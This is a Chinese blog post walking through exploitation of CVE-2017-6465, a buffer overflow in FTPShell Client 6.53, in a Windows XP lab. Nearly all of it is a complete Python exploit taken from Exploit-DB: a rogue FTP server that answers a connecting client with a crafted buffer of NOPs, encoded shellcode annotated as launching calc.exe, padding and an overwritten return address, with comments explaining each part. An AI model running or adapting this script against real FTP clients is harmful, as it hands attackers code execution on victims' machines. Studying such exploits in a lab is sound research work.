CVE-2017-6465 FTPShell Client 6.53之缓冲区溢出利用

时间：2017-03-07 08:46:55 阅读：302 评论：0 收藏：0 [点我收藏+]

标签：cto 未在 link nbsp 溢出替换 python except add

0x00.前言

　　FTPShell是一款国外Windows平台下比较流行的FTP服务工具，截至本文客户端最新版6.53下载地址:http://www.ftpshell.com/downloadclient.htm#

　　实验环境：VMWare + WinXP SP3 EN

　　Vulnerable App 获取地址：http://www.ftpshell.com/downloadclient.htm#

0x01.利用

　　该缓冲区溢出漏洞发生在客户端与FTP服务端初始化认证连接阶段，首先实验环境下安装好 FTPShell Client 6.53

技术分享

　　这里我们直接使用Explit-DB提供的python代码搭建一台恶意FTP服务器

 1 # Exploit Title: FTPShell Client 6.53 buffer overflow on making initial connection
 2 # Date: 2017-03-04
 3 # Exploit Author: Peter Baris
 4 # Vendor Homepage: http://www.saptech-erp.com.au
 5 # Software Link: http://www.ftpshell.com/downloadclient.htm
 6 # Version: Windows Server 2008 R2 x64
 7 # Tested on: Windows Server 2008 R2 Standard x64
 8 # CVE: CVE-2017-6465
 9 # 2017-03-04: Software vendor notified
10 # 2017-03-06: No reply
11 # 2017-03-06: Publishing
12 
13 import socket
14 import sys
15  
16 shell=("\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
17 "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
18 "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
19 "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
20 "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44"
21 "\x42\x30\x42\x50\x42\x30\x4b\x38\x45\x54\x4e\x33\x4b\x58\x4e\x37"
22 "\x45\x50\x4a\x47\x41\x30\x4f\x4e\x4b\x38\x4f\x44\x4a\x41\x4b\x48"
23 "\x4f\x35\x42\x32\x41\x50\x4b\x4e\x49\x34\x4b\x38\x46\x43\x4b\x48"
24 "\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x39\x4e\x4a\x46\x48\x42\x4c"
25 "\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x30\x44\x4c\x4b\x4e"
26 "\x46\x4f\x4b\x43\x46\x35\x46\x42\x46\x30\x45\x47\x45\x4e\x4b\x48"
27 "\x4f\x35\x46\x42\x41\x50\x4b\x4e\x48\x46\x4b\x58\x4e\x30\x4b\x54"
28 "\x4b\x58\x4f\x55\x4e\x31\x41\x50\x4b\x4e\x4b\x58\x4e\x31\x4b\x48"
29 "\x41\x30\x4b\x4e\x49\x38\x4e\x45\x46\x52\x46\x30\x43\x4c\x41\x43"
30 "\x42\x4c\x46\x46\x4b\x48\x42\x54\x42\x53\x45\x38\x42\x4c\x4a\x57"
31 "\x4e\x30\x4b\x48\x42\x54\x4e\x30\x4b\x48\x42\x37\x4e\x51\x4d\x4a"
32 "\x4b\x58\x4a\x56\x4a\x50\x4b\x4e\x49\x30\x4b\x38\x42\x38\x42\x4b"
33 "\x42\x50\x42\x30\x42\x50\x4b\x58\x4a\x46\x4e\x43\x4f\x35\x41\x53"
34 "\x48\x4f\x42\x56\x48\x45\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x37"
35 "\x42\x35\x4a\x46\x42\x4f\x4c\x48\x46\x50\x4f\x45\x4a\x46\x4a\x49"
36 "\x50\x4f\x4c\x58\x50\x30\x47\x45\x4f\x4f\x47\x4e\x43\x36\x41\x46"
37 "\x4e\x36\x43\x46\x42\x50\x5a")    #这里替换成弹出calc.exe的shellcode
38  
39 port = 21
40  
41 try:
42         s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
43         s.bind(("0.0.0.0", port))　　#绑定本地21端口
44         s.listen(5)　　　　　　　　　　#开启FTP服务监听
45         print("[i] FTP server started on port: "+str(port)+"\r\n")
46 except:
47         print("[!] Failed to bind the server to port: "+str(port)+"\r\n")
48  
49  
50 # 004b95dc in ftpshell.exe PUSH ESI ; RETN
51 eip = "\xdc\x95\x4b"　　#该地址在WinXP SP3 EN中仍可使用
52 nops = "\x90"*8
53 junk = "A"*(400-len(nops)-len(shell))
54 buffer = nops + shell + junk + eip　　#构造出恶意Buffer结构
55  
56 while True:
57     conn, addr = s.accept()
58     conn.send(‘220 Welcome to your unfriendly FTP server\r\n‘)
59     print(conn.recv(1024))
60     conn.send("331 OK\r\n")
61     print(conn.recv(1024))
62     conn.send(‘230 OK\r\n‘)
63     print(conn.recv(1024))
64     conn.send(‘220 "‘+buffer+‘" is current directory\r\n‘)　　#发送恶意Buffer结构